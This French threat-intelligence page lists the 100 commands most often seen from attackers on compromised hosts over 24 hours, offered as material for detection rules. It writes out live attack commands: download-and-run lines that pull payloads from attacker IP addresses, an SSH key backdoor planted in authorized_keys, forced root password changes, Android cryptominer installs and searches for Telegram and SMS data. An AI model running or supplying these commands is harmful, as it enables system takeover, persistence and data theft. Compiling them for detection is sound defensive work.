TROYANOSYVIRUS
Mis a jour: mai 2026

Top 100 des commandes malveillantes

Les commandes les plus executees par les attaquants apres avoir obtenu l'acces au systeme. Utile pour la detection d'intrusions et la reponse aux incidents.

1,397 commandes en 24h
1.
$Enter new UNIX password:
32 IPs88x
2.
$uname -a
42 IPs58x
3.
$cd ~; chattr -ia .ssh; lockr -ia .ssh
42 IPs58x
4.
$lockr -ia .ssh
42 IPs58x
5.
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
41 IPs57x
6.
$w
40 IPs56x
7.
$uname -m
40 IPs56x
8.
$top
40 IPs56x
9.
$uname
40 IPs56x
10.
$which ls
40 IPs56x
11.
$cat /proc/cpuinfo | grep model | grep name | wc -l
40 IPs56x
12.
$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
40 IPs56x
13.
$cat /proc/cpuinfo | grep name | wc -l
40 IPs56x
14.
$ls -lh $(which ls)
40 IPs56x
15.
$crontab -l
40 IPs56x
16.
$whoami
39 IPs55x
17.
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
39 IPs55x
18.
$lscpu | grep Model
39 IPs55x
19.
$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
38 IPs54x
20.
$/bin/./uname -s -v -n -r -m
13 IPs38x
21.
$cd /data/local/tmp;mkdir .p 2>/dev/null;cd .p;(wget -qO b http://89.32.41.16/bins/parm7 2>/dev/null||busybox wget -qO b http://89.32.41.16/bins/parm7 2>/dev/null||curl -so b http://89.32.41.16/bins/parm7 2>/dev/null||toybox wget -qO b http://89.32.41.16/bins/parm7 2>/dev/null);chmod 777 b 2>/dev/null;(su 0 ./b adb||./b adb) 2>/dev/null;rm -f b;(wget -qO b http://89.32.41.16/bins/parm5 2>/dev/null||busybox wget -qO b http://89.32.41.16/bins/parm5 2>/dev/null||curl -so b http://89.32.41.16/bins/pa
1 IPs18x
22.
$uname -s -v -n -r -m
5 IPs14x
23.
$rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
11 IPs12x
24.
$PING
5 IPs10x
25.
$/ip cloud print
3 IPs6x
26.
$/data/local/tmp/nohup su -c /data/local/tmp/trinity
2 IPs4x
27.
$chmod 0755 /data/local/tmp/trinity
2 IPs4x
28.
$chmod 0755 /data/local/tmp/nohup
2 IPs4x
29.
$Accept-Encoding: gzip
2 IPs4x
30.
$pm install /data/local/tmp/ufo.apk
2 IPs4x
31.
$pm path com.ufo.miner
2 IPs4x
32.
$ps | grep trinity
2 IPs4x
33.
$rm -f /data/local/tmp/ufo.apk
2 IPs4x
34.
$rm -rf /data/local/tmp/*
2 IPs4x
35.
$am start -n com.ufo.miner/com.example.test.MainActivity
2 IPs4x
36.
$/data/local/tmp/nohup /data/local/tmp/trinity
2 IPs4x
37.
$cat /proc/cpuinfo
3 IPs3x
38.
$ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
3 IPs3x
39.
$cd /data/local/tmp/; busybox wget http://176.65.139.20/w.sh; sh w.sh android.exploit; curl http://176.65.139.20/c.sh; sh c.sh android.exploit
1 IPs3x
40.
$ifconfig
3 IPs3x
41.
$locate D877F783D5D3EF8Cs
3 IPs3x
42.
$cd /data/local/tmp/; busybox wget http://83.168.110.191/cat.sh; sh cat.sh; curl http://83.168.110.191/cat.sh; sh cat.sh; wget http://83.168.110.191/cat.sh; sh cat.sh; curl http://83.168.110.191/cat.sh; sh cat.sh; busybox wget http://83.168.110.191/cat.sh; sh cat.sh; busybox curl http://83.168.110.191/cat.sh; sh cat.sh
1 IPs3x
43.
$echo Hi | cat -n
3 IPs3x
44.
$ps -ef | grep '[Mm]iner'
3 IPs3x
45.
$ps | grep '[Mm]iner'
3 IPs3x
46.
$?
1 IPs2x
47.
$linuxshell
1 IPs2x
48.
$echo "$(getprop ro.product.name 2>/dev/null) $(whoami 2>/dev/null)"
1 IPs2x
49.
$shell
1 IPs2x
50.
$start
1 IPs2x
51.
$system
1 IPs2x
52.
$config terminal
1 IPs2x
53.
$>/data/local/tmp/.gtconfig && cd /data/local/tmp; >/sdcard/0/Downloads/.gtconfig && cd /sdcard/0/Downloads; >/storage/emulated/0/Downloads && cd /storage/emulated/0/Downloads; rm -rf wwg bwwg bbcl ccl; wget http://85.239.151.41/wwg; sh wwg; busybox wget http://85.239.151.41/bwwg; sh bwwg; busybox ccl http://85.239.151.41/bbcl > bbcl; sh bbcl; ccl http://85.239.151.41/ccl > ccl; sh ccl
1 IPs2x
54.
$adminpass
1 IPs2x
55.
$echo "root:d0dLaYGDTdok"|chpasswd|bash
1 IPs1x
56.
$echo "root:eGmh7zymjV4y"|chpasswd|bash
1 IPs1x
57.
$echo "root:niayk6mjZgrn"|chpasswd|bash
1 IPs1x
58.
$echo "root:pwPPxUhCPri2"|chpasswd|bash
1 IPs1x
59.
$echo "root:saUNg8VG8CzB"|chpasswd|bash
1 IPs1x
60.
$echo "user100\nBn05hxwncoqo\nBn05hxwncoqo\n"|passwd
1 IPs1x
61.
$echo "vikram\nZ1GGxR1dIIgv\nZ1GGxR1dIIgv\n"|passwd
1 IPs1x
62.
$echo "xxlx123xxlx\n2xTXSjegGp2I\n2xTXSjegGp2I\n"|passwd
1 IPs1x
63.
$echo -e "123123\njPJVR4svvpcH\njPJVR4svvpcH"|passwd|bash
1 IPs1x
64.
$echo -e "12345678\nVqyeZ1DCEv4P\nVqyeZ1DCEv4P"|passwd|bash
1 IPs1x
65.
$echo -e "12345678\nZnpRL6QQ2qnQ\nZnpRL6QQ2qnQ"|passwd|bash
1 IPs1x
66.
$echo -e "123456\nGD7XFFpokPJO\nGD7XFFpokPJO"|passwd|bash
1 IPs1x
67.
$echo -e "123456a@\nAZHs0Ma0QF4A\nAZHs0Ma0QF4A"|passwd|bash
1 IPs1x
68.
$echo -e "123456a@\nTpaTLOafvSFc\nTpaTLOafvSFc"|passwd|bash
1 IPs1x
69.
$echo -e "1234\nIexkPAndMbQ6\nIexkPAndMbQ6"|passwd|bash
1 IPs1x
70.
$echo -e "1qaz2wsx\nooJMynQwO7Zk\nooJMynQwO7Zk"|passwd|bash
1 IPs1x
71.
$echo -e "Aa12345!\nMVbxAUcfyp8V\nMVbxAUcfyp8V"|passwd|bash
1 IPs1x
72.
$echo -e "Aa12345!\ntYcJNtoVAX53\ntYcJNtoVAX53"|passwd|bash
1 IPs1x
73.
$echo -e "Aa12345!\ntnBOr8VYZtsP\ntnBOr8VYZtsP"|passwd|bash
1 IPs1x
74.
$echo -e "Aa123456789\nojrrkMBEXdPY\nojrrkMBEXdPY"|passwd|bash
1 IPs1x
75.
$echo -e "Pa$$word1\nJ7OkxMphMxem\nJ7OkxMphMxem"|passwd|bash
1 IPs1x
76.
$echo -e "Pa$$word1\nedkg3RYhDq1h\nedkg3RYhDq1h"|passwd|bash
1 IPs1x
77.
$echo -e "Passw0rd\njjCZGqLRWoN9\njjCZGqLRWoN9"|passwd|bash
1 IPs1x
78.
$echo -e "Passw0rd\nzVSfKrwJhZEU\nzVSfKrwJhZEU"|passwd|bash
1 IPs1x
79.
$echo -e "TestUser\nEvCVB0zclJWN\nEvCVB0zclJWN"|passwd|bash
1 IPs1x
80.
$echo -e "Welcome1\ndBLtMdP8eG8T\ndBLtMdP8eG8T"|passwd|bash
1 IPs1x
81.
$echo -e "Welcome1\nltn9rdYm0NYN\nltn9rdYm0NYN"|passwd|bash
1 IPs1x
82.
$echo -e "debian2022\nEsLXjKeLW2vZ\nEsLXjKeLW2vZ"|passwd|bash
1 IPs1x
83.
$echo -e "dev#123\nXZVu3djER8ug\nXZVu3djER8ug"|passwd|bash
1 IPs1x
84.
$echo -e "digitalizacion\nSw62PktuLVsW\nSw62PktuLVsW"|passwd|bash
1 IPs1x
85.
$echo -e "git123git\n5GUkuSNhWNJ8\n5GUkuSNhWNJ8"|passwd|bash
1 IPs1x
86.
$echo -e "gitlab\nIw8i1QnWyCqw\nIw8i1QnWyCqw"|passwd|bash
1 IPs1x
87.
$echo -e "guest2024\nLF5YlgrvqKWr\nLF5YlgrvqKWr"|passwd|bash
1 IPs1x
88.
$echo -e "hduser\n1nalzlEl8vfZ\n1nalzlEl8vfZ"|passwd|bash
1 IPs1x
89.
$echo -e "hgfdsa\n5t5SlsDkZI3J\n5t5SlsDkZI3J"|passwd|bash
1 IPs1x
90.
$echo -e "hgfdsa\naomw3nf1ugO9\naomw3nf1ugO9"|passwd|bash
1 IPs1x
91.
$echo -e "hgfdsa\nd2YlySTAbfoK\nd2YlySTAbfoK"|passwd|bash
1 IPs1x
92.
$echo -e "mypassword\n3Jm8VO66Glgm\n3Jm8VO66Glgm"|passwd|bash
1 IPs1x
93.
$echo -e "mypassword\nUVgxXKnzIadg\nUVgxXKnzIadg"|passwd|bash
1 IPs1x
94.
$echo -e "oracle@12345\nzphxSf8ntWEa\nzphxSf8ntWEa"|passwd|bash
1 IPs1x
95.
$echo -e "passw0rd\nIGGrKTcLB1km\nIGGrKTcLB1km"|passwd|bash
1 IPs1x
96.
$echo -e "password@123\nFe87vUXNLgOb\nFe87vUXNLgOb"|passwd|bash
1 IPs1x
97.
$echo -e "qwer1234\nLYas4GwRNVwO\nLYas4GwRNVwO"|passwd|bash
1 IPs1x
98.
$echo -e "qwer1234\nq5F9vvc2Jfo3\nq5F9vvc2Jfo3"|passwd|bash
1 IPs1x
99.
$echo -e "qwer1234\nrPozEsTXdNDh\nrPozEsTXdNDh"|passwd|bash
1 IPs1x
100.
$echo -e "qwer1234\nrnI41w3IVVxL\nrnI41w3IVVxL"|passwd|bash
1 IPs1x

Reconnaissance

uname, whoami, cat /etc/passwd

Telechargement

wget, curl, tftp

Persistance

crontab, chmod, chattr

Mouvement lateral

ssh, scp, ping

Utilisation pour la detection

Ces commandes peuvent etre utilisees pour creer des regles de detection dans les SIEM, IDS/IPS et systemes de surveillance. Surveillez ces modeles dans vos logs pour detecter les intrusions.